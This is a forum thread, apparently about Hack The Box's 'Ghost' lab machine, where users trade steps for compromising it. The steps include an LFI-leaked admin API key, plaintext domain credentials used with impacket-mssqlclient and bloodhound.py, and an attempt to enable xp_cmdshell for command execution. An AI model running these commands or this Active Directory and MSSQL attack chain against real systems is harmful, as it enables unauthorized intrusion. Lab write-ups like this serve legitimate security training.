Ghost - Insane
by f4k3h4ck3r - Saturday July 13, 2024 at 03:43 PM
#31
does anyone know what to do once we have gotten a reverse shell?
#32
found not much in 'florence.ramirez@LINUX-DEV-WS01:~$'

florence.ramirez@LINUX-DEV-WS01:~$ ls -la /home/GHOST/florence.ramirez
ls -la /home/GHOST/florence.ramirez
total 8
drwxr-xr-x 2 root root 4096 Feb  1 23:47 .
drwxr-xr-x 3 root root 4096 Feb  1 23:47 ..
lrwxrwxrwx 1 root root    9 Feb  1 23:47 .bash_history -> /dev/null
#33
port 8000 is open on that 172 address in hosts and the 10 just times out.....I was gonna try and see what's there

this is one of those rare windows boxes running a linux container or vm.......
#34
Quote:key = '65bc2f4126db7d00010702ca:55466083d9d8ee5a8c424efa944369dd4b573f5cc807011578f6e02695556c40'

Found in the ghost.db using the LFI.
With this you can create a JWT and access the ghost admin API as described at https://ghost.org/docs/admin-api/
Probably not relevant.
There is also a hash for kaythrn but it can't be cracked.

The florence.ramirez ssh credentials are valid domain credentials. With it we can run bloodhound and connect to mssql.
impacket-mssqlclient florence.ramirez:'uxLmt*udNc6t3HrF'@ghost.htb -windows-auth

With mssql we get a useless NTLMv2-SSP Hash and traverse the windows filesystem.

ADFS_GMSA$ and JUSTIN.BRADLEY are remote management users. Probably we have to get to one of those.
#35
mssql login with this user and get cmd shell, after that get windows shell

(Jul 14, 2024, 09:25 AM)ritualist Wrote:
Quote:key = '65bc2f4126db7d00010702ca:55466083d9d8ee5a8c424efa944369dd4b573f5cc807011578f6e02695556c40'

Found in the ghost.db using the LFI.
With this you can create a JWT and access the ghost admin API as described at https://ghost.org/docs/admin-api/
Probably not relevant.
There is also a hash for kaythrn but it can't be cracked.

The florence.ramirez ssh credentials are valid domain credentials. With it we can run bloodhound and connect to mssql.
impacket-mssqlclient florence.ramirez:'uxLmt*udNc6t3HrF'@ghost.htb -windows-auth

With mssql we get a useless NTLMv2-SSP Hash and traverse the windows filesystem.

ADFS_GMSA$ and JUSTIN.BRADLEY are remote management users. Probably we have to get to one of those.

how to enable xp_cmdshell

#36
(Jul 14, 2024, 09:25 AM)ritualist Wrote:
Quote:key = '65bc2f4126db7d00010702ca:55466083d9d8ee5a8c424efa944369dd4b573f5cc807011578f6e02695556c40'

Found in the ghost.db using the LFI.
With this you can create a JWT and access the ghost admin API as described at https://ghost.org/docs/admin-api/
Probably not relevant.
There is also a hash for kaythrn but it can't be cracked.

The florence.ramirez ssh credentials are valid domain credentials. With it we can run bloodhound and connect to mssql.
impacket-mssqlclient florence.ramirez:'uxLmt*udNc6t3HrF'@ghost.htb -windows-auth

With mssql we get a useless NTLMv2-SSP Hash and traverse the windows filesystem.

ADFS_GMSA$ and JUSTIN.BRADLEY are remote management users. Probably we have to get to one of those.

looks like florence.ramirez doesn't have enough permission for xp_cmdshell

SQL (GHOST\florence.ramirez  guest@master)> enable_xp_cmdshell;
[%] exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;
[-] ERROR(DC01): Line 105: User does not have permission to perform this action.
[-] ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(DC01): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
[-] ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE statement.
Reply
#37
so how to bypass .. someone bypass that way and get a mssql server shell

#38
bloodhound works with florence.ramirez without mssql server

bloodhound.py -d ghost.htb -c All -ns 10.x.x.x --zip  -u florence.ramirez -p 'uxLmt*udNc6t3HrF' --use-ldap
INFO: Found AD domain: ghost.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.ghost.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc01.ghost.htb
INFO: Found 1 domains
INFO: Found 2 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc01.ghost.htb
INFO: Found 16 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 20 containers
INFO: Found 1 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: linux-dev-ws01.ghost.htb
INFO: Querying computer: DC01.ghost.htb
WARNING: Could not resolve: linux-dev-ws01.ghost.htb: The DNS query name does not exist: linux-dev-ws01.ghost.htb.
INFO: Done in 00M 12S
INFO: Compressing output into 20240714160508_bloodhound.zip
#39
(Jul 14, 2024, 10:24 AM)osamy7593 Wrote: so how to bypass .. someone bypass that way and get a mssql server shell

It could be the Login user is not in the server role ..?? Something similar... it's logged under "guest"
#40
(Jul 14, 2024, 10:40 AM)ZeetaOnline Wrote:
(Jul 14, 2024, 10:24 AM)osamy7593 Wrote: so how to bypass .. someone bypass that way and get a mssql server shell

It could be the Login user is not in the server role ..?? Something similar... it's logged under "guest"

yes he logged as mysql server account
